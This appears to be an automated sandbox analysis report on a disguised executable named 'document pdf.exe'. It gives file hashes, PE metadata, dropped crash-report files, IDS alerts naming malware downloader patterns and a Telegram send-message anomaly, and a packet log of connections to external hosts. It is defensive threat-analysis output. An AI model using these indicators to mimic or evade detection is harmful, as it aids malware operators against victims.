                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):309231
                                                                                                                      Entropy (8bit):4.066699273044065
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:clLe6SVGBDhW8V6w0xbr2o4uEqN+O+vLTgHiyJf1bp:clL1SVGBtRXeGo4++O+DTgCyr
                                                                                                                      MD5:5F3B2D5C84A52AABCDB08A535ADDB597
                                                                                                                      SHA1:9A73A738185FB55697BFFF8BE50C8A806DB6ABC1
                                                                                                                      SHA-256:0C737E630ADAC246CA33BAC6605558E4D37A6A9C6609F9ED618A24D6FD9D8325
                                                                                                                      SHA-512:DBC2D2B71CBD0D27B5ECAA610450FF27A393C4C6B69621AB3CF0A90DDDC2D86A7F47E27D4210B5962CBDEFE09D7025055EA30859CE03367EC8D79DE4BB3C8977
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:MDMP..a..... .......6.{g............D...............X.......$...\$......$....S..........`.......8...........T............4..7............$..........l&..............................................................................eJ.......'......GenuineIntel............T.......\...3.{g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE3C.tmp.WERInternalMetadata.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8418
                                                                                                                      Entropy (8bit):3.6931458086857663
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:R6l7wVeJBLl6hmi6Y2DTmSU90ycgmfZwNpra89bt+sfjvm:R6lXJX6N6YvSU9Pcgmfazt9fS
                                                                                                                      MD5:FCFE1687E5FE1E24F8A0F917FAA798F3
                                                                                                                      SHA1:458B6D22B1499ADC9F3DCAB64DCD67809718D68E
                                                                                                                      SHA-256:C478FC4D83690346677F1A465CE90F7075337ACB2B2976DEDBAA81C268FAAE65
                                                                                                                      SHA-512:FBD70F1BD3C1B79642CC27475C8B6AB95F4C0DAB3376ABC4753C4CDA15B47912D877073D52E3B6E91BC3BD213C116A4CE5C49D5D2FB8574FCECB300BB576AAD9
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.2.0.<./.P.i.

                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE9A.tmp.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4751
                                                                                                                      Entropy (8bit):4.457807230516727
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:cvIwWl8zsDNJg77aI9BWWpW8VYvYm8M4J7EtbfFco+q8vdtb8mUDdp0dVCd:uIjfLI7P37VfJ7ERqoKdR8mUxp0dVCd
                                                                                                                      MD5:3615BD54168E56AC04D094C763333600
                                                                                                                      SHA1:71CAB1EB9A8A00097C816319B6B8D0ED5DB8DA13
                                                                                                                      SHA-256:61236876295607A3384F24E00A09AB236B720E5235743C8D7C8675497DCDDDAA
                                                                                                                      SHA-512:BEB768F81C2217F3E7A0F390BC0EC156324C96C0C06C8BDA8AD3D91A856C06F188D456928FD31F1D270745DCAFCC444782CFD14B86502EDD7ACBDC3E402BCE0B
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="664203" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\document pdf.exe.log

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\document pdf.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):1216
                                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                      Malicious:true
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1835008
                                                                                                                      Entropy (8bit):4.468755808571753
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:vzZfpi6ceLPx9skLmb0fzZWSP3aJG8nAgeiJRMMhA2zX4WABluuNKjDH5S:7ZHtzZWOKnMM6bFpwj4
                                                                                                                      MD5:DDD2BE517BADB51059B007FC390F2B4F
                                                                                                                      SHA1:13F406617898A25A195095C2B2641AC9FB137797
                                                                                                                      SHA-256:432E37A067DC4BBAF1ED027DD555DEEA134773B3DF569776E84EE7F8AD03D9AB
                                                                                                                      SHA-512:B31D7E478DC338B5B8A70CB02A2F873CD8942775F7BC1747025443418C56F05FC2214166EB6E866799563E90E89E0E85180445F456102F747A5F0CB117A6C35E
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*mA.K`...............................................................................................................................................................................................................................................................................................................................................gW.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Entropy (8bit):7.853019642802023
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                      File name:document pdf.exe
                                                                                                                      File size:759'808 bytes
                                                                                                                      MD5:c67b6ff2d472bf82dc4da545dbc37a43
                                                                                                                      SHA1:c5e677e5e48d5ca965b6e2d3f0c8b56fb80e7be5
                                                                                                                      SHA256:df3c8cc4eaf6b0a8a6a0254c54160486df1b38f8a6591a60dbc520f38389c400
                                                                                                                      SHA512:69ba6f8e9e99f09a669ae875412af6bcb87dd649161e8e725be05c9db2ce8fe20da88de509cd9208a427b93172caeb94ed588efa5697eb0ebf5fe262d8943e11
                                                                                                                      SSDEEP:12288:74doaeS+/ZgdvAC+O8DzxPzNjZGtypP2q2PEexgQNqaCBCrRKNr6sj9Gn:EdFeSTdv+O8vxPzNjUtE7280RNqaLrMc
                                                                                                                      TLSH:C4F412E8AE15CC86D8C607B50A32F33B66784E9ED923C253CBDCFDF7751166964182A0
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W.sg..............0..r...$......B.... ........@.. ....................................@................................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:53952576d1abd26e

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x4b9142
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x67738157 [Tue Dec 31 05:29:59 2024 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add al, byte ptr [eax]
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al
                                                                                                                      add byte ptr [eax], al

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb90f00x4f.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x21a0.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x20000xb71680xb72008cd28819f66881db546fcdecf83efc16False0.9313246587030717data7.85898553696103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0xba0000x21a00x2200a31bd1c02d4d4cbb683678a915ffa8d7False0.8984375data7.474587072139768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0xbe0000xc0x20069949a08773b28bfcd5c98e6312f10fbFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0xba0c80x1d72PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9698859113823295
                                                                                                                      RT_GROUP_ICON0xbbe4c0x14data1.05
                                                                                                                      RT_VERSION0xbbe700x32cdata0.4618226600985222

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2025-01-06T16:01:11.323685+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649731132.226.8.16980TCP
                                                                                                                      2025-01-06T16:01:12.526830+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649731132.226.8.16980TCP
                                                                                                                      2025-01-06T16:01:13.092549+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649750188.114.96.3443TCP
                                                                                                                      2025-01-06T16:01:14.276805+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649756132.226.8.16980TCP
                                                                                                                      2025-01-06T16:01:14.845558+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649769188.114.96.3443TCP
                                                                                                                      2025-01-06T16:01:16.236493+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649778188.114.96.3443TCP
                                                                                                                      2025-01-06T16:01:17.739768+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649790188.114.96.3443TCP
                                                                                                                      2025-01-06T16:01:22.185426+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649825188.114.96.3443TCP
                                                                                                                      2025-01-06T16:01:25.666289+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.649847149.154.167.220443TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 6, 2025 16:01:09.443880081 CET4973180192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:09.448697090 CET8049731132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:09.451230049 CET4973180192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:09.454629898 CET4973180192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:09.459398985 CET8049731132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.017657042 CET8049731132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.027211905 CET4973180192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:11.031995058 CET8049731132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.280863047 CET8049731132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.323684931 CET4973180192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:11.355398893 CET49744443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:11.355431080 CET44349744188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.355518103 CET49744443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:11.415021896 CET49744443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:11.415035963 CET44349744188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.897778034 CET44349744188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.897888899 CET49744443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:11.908380032 CET49744443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:11.908396959 CET44349744188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.908735991 CET44349744188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:11.950437069 CET49744443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:12.053241014 CET49744443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:12.099339962 CET44349744188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:12.170140982 CET44349744188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:12.170202017 CET44349744188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:12.170300007 CET49744443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:12.204561949 CET49744443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:12.210125923 CET4973180192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:12.214957952 CET8049731132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:12.477199078 CET8049731132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:12.480148077 CET49750443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:12.480175018 CET44349750188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:12.480236053 CET49750443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:12.480727911 CET49750443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:12.480740070 CET44349750188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:12.526829958 CET4973180192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:12.956809998 CET44349750188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:12.963751078 CET49750443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:12.963763952 CET44349750188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:13.092585087 CET44349750188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:13.092645884 CET44349750188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:13.092699051 CET49750443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:13.093344927 CET49750443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:13.097086906 CET4973180192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:13.098479033 CET4975680192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:13.103308916 CET8049756132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:13.103389978 CET4975680192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:13.103512049 CET4975680192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:13.104187012 CET8049731132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:13.104269981 CET4973180192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:13.108227968 CET8049756132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.221856117 CET8049756132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.231432915 CET49769443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:14.231482029 CET44349769188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.231548071 CET49769443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:14.231995106 CET49769443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:14.232011080 CET44349769188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.276804924 CET4975680192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:14.700351000 CET44349769188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.702382088 CET49769443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:14.702408075 CET44349769188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.845314026 CET44349769188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.845372915 CET44349769188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.845520020 CET49769443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:14.846013069 CET49769443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:14.852261066 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:14.857026100 CET8049772132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:14.857084990 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:14.857208014 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:14.862010002 CET8049772132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:15.638887882 CET8049772132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:15.640721083 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:15.640765905 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:15.640834093 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:15.641274929 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:15.641294003 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:15.683053017 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.099010944 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.101175070 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:16.101197004 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.236545086 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.236607075 CET44349778188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.236716986 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:16.237221003 CET49778443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:16.240848064 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.242088079 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.245820999 CET8049772132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.245964050 CET4977280192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.247176886 CET8049784132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:16.247239113 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.247406006 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:16.252345085 CET8049784132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.113532066 CET8049784132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.115052938 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.115098953 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.115237951 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.115540028 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.115562916 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.167445898 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.579071999 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.580980062 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.581022978 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.739783049 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.739857912 CET44349790188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.739979982 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.740607977 CET49790443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:17.744532108 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.745976925 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.749665022 CET8049784132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.750772953 CET8049795132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:17.750850916 CET4978480192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.750883102 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.751070976 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:17.755872965 CET8049795132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:18.564538956 CET8049795132.226.8.169192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:18.566026926 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:18.566061974 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:18.566145897 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:18.566433907 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:18.566451073 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:18.604983091 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.042164087 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.046576023 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:19.046596050 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.217732906 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.217797041 CET44349801188.114.96.3192.168.2.6
                                                                                                                      Jan 6, 2025 16:01:19.217868090 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:19.218409061 CET49801443192.168.2.6188.114.96.3
                                                                                                                      Jan 6, 2025 16:01:19.222429037 CET4979580192.168.2.6132.226.8.169
                                                                                                                      Jan 6, 2025 16:01:19.223521948 CET4980780192.168.2.6132.226.8.169
